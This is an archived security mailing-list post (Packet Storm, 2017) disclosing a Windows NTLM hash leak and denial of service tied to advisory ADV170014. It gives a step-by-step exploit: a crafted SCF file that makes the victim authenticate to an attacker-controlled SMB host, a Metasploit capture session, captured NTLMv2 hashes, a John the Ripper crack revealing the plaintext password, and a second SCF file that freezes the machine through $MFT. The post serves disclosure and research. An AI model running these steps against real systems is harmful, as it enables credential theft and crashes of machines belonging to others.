Exploit the possiblities

Windows NTLM Auth Hash Disclosure / Denial Of Service

Windows NTLM Auth Hash Disclosure / Denial Of Service
Posted Oct 25, 2017
Authored by Juan Diego

Under certain circumstances a shared folder on Windows can be abused remotely to obtain the user credentials and to freeze the machine.

tags | exploit
systems | windows
MD5 | 75df1861286943e3f336ac2f00048071

Windows NTLM Auth Hash Disclosure / Denial Of Service

Change Mirror Download
Hello,

I want to share some information with the people on the list.
On May 24, I found a problem with NTLM auth on Windows.

Under certain circumstances a shared folder on Windows can be abused
remotely to obtain the user credentials and to freeze the machine.

This was already reported to MSRC on May 24, and was closed on October 18.

This attack makes use of SCF files, and a shared folder with certain
configuration.

-Create a folder anywhere on the system, example on the Desktop
-Right click - Properties
-Sharing tab
-Network and Sharing center
-Enable 'Turn off password protected sharing'

Now, you need a crafted SCF file to abuse this, the file looks like this

root@sysadminjd:~# cat test.scf
[Shell]
Command=2
IconFile=\\192.168.1.111\share\test.ico
[Taskbar]
Command=ToggleDesktop

root@sysadminjd:~#

We are going to upload this file to the newly shared folder, we'll use
smbclient, but first we need a metasploit console running capture/smb
auxiliary module.

root@sysadminjd:~# msfconsole -q

msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt
JOHNPWFILE = /tmp/smbhash.txt
msf auxiliary(smb) > exploit -j
[*] Auxiliary module running as background job

[*] Server started.
msf auxiliary(smb)


Now we can upload the file

root@sysadminjd:~# smbclient //192.168.1.67/Users
WARNING: The "syslog" option is deprecated
Enter root's password:
OS=[Windows 7 Ultimate 7601 Service Pack 1] Server=[Windows 7 Ultimate 6.1]
smb: \> cd juan
smb: \juan\> cd Desktop\
smb: \juan\Desktop\> cd prueba2\
smb: \juan\Desktop\prueba2\> put test.scf
putting file test.scf as \juan\Desktop\prueba2\test.scf (88.9 kb/s)
(average 88.9 kb/s)
smb: \juan\Desktop\prueba2\> ls
. D 0 Mon Oct 23 12:27:15 2017
.. D 0 Mon Oct 23 12:27:15 2017
.DS_Store AH 6148 Tue May 23 17:29:03 2017
test.scf A 91 Mon Oct 23 12:27:15 2017

6527487 blocks of size 4096. 4043523 blocks available
smb: \juan\Desktop\prueba2\>
root@sysadminjd:~#

Our metasploit console should look like this

msf auxiliary(smb) >
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:47894338d99abe2f08e2c693618c7323
NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:e97b70559f29462e2ca221d31113b9ca
NT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:27:15 -0400
NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:eb8b228b739cc95a12d7e0d89d89e002
NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:4abb0803c4afd1509bfca3bbc566ad70
NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000
[*] SMB Captured - 2017-10-23 12:37:09 -0400
NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67
USER:juan DOMAIN:juan-PC OS: LM:
LMHASH:Disabled
LM_CLIENT_CHALLENGE:Disabled
NTHASH:5eeb82aab85e9663624aaf6500e4d8f8
NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000

I chopped this one to avoid sending too much to the list.

When we started the smb capture module, we passed the option

msf auxiliary(smb) > set JOHNPWFILE /tmp/smbhash.txt

So our hashes are on /tmp/smbhash.txt

Let's try with John

root@sysadminjd:~# cd /tmp/
root@sysadminjd:/tmp# john smbhash.txt_netntlmv2
Using default input encoding: UTF-8
Rules/masks using ISO-8859-1
Loaded 6 password hashes with 6 different salts (netntlmv2, NTLMv2 C/R [MD4
HMAC-MD5 32/64])
Press 'q' or Ctrl-C to abort, almost any other key for status
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
abc (juan)
6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s
585124C/s abc
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@sysadminjd:/tmp#

That's it, now we have the plain text password for the machine.

If we want to freeze the machine, we can attack via $MFT with a SCF file
like this

root@sysadminjd:~# cat mft.scf
[Shell]
Command=2
IconFile= c:\$MFT\123
[Taskbar]
Command=ToggleDesktop
root@sysadminjd:~#

Just upload it to the vulnerable folder, and the machine will freeze in a
few minutes due to $MFT NTFS issue.

Accordingly to MS, all Windows versions are affected, they released an
advisory for this:
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/ADV170014#ID0EGB

It's a partial patch, there are no real fix for this, and the regcode
change proposed by MS is only for Windows 10 and Server 2016.

I have a better-explained post about this on my blog

English: http://www.sysadminjd.com/adv170014-ntlm-sso-exploitation-guide/
Spanish: https://www.sysadminjd.com/adv170014-ntlm-sso-guia-de-explotacion/

thanks for your time :)

Best Regards


Juan Diego
--------
aSS


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

November 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    22 Files
  • 2
    Nov 2nd
    28 Files
  • 3
    Nov 3rd
    10 Files
  • 4
    Nov 4th
    1 Files
  • 5
    Nov 5th
    5 Files
  • 6
    Nov 6th
    15 Files
  • 7
    Nov 7th
    15 Files
  • 8
    Nov 8th
    13 Files
  • 9
    Nov 9th
    9 Files
  • 10
    Nov 10th
    9 Files
  • 11
    Nov 11th
    3 Files
  • 12
    Nov 12th
    2 Files
  • 13
    Nov 13th
    15 Files
  • 14
    Nov 14th
    17 Files
  • 15
    Nov 15th
    19 Files
  • 16
    Nov 16th
    15 Files
  • 17
    Nov 17th
    19 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close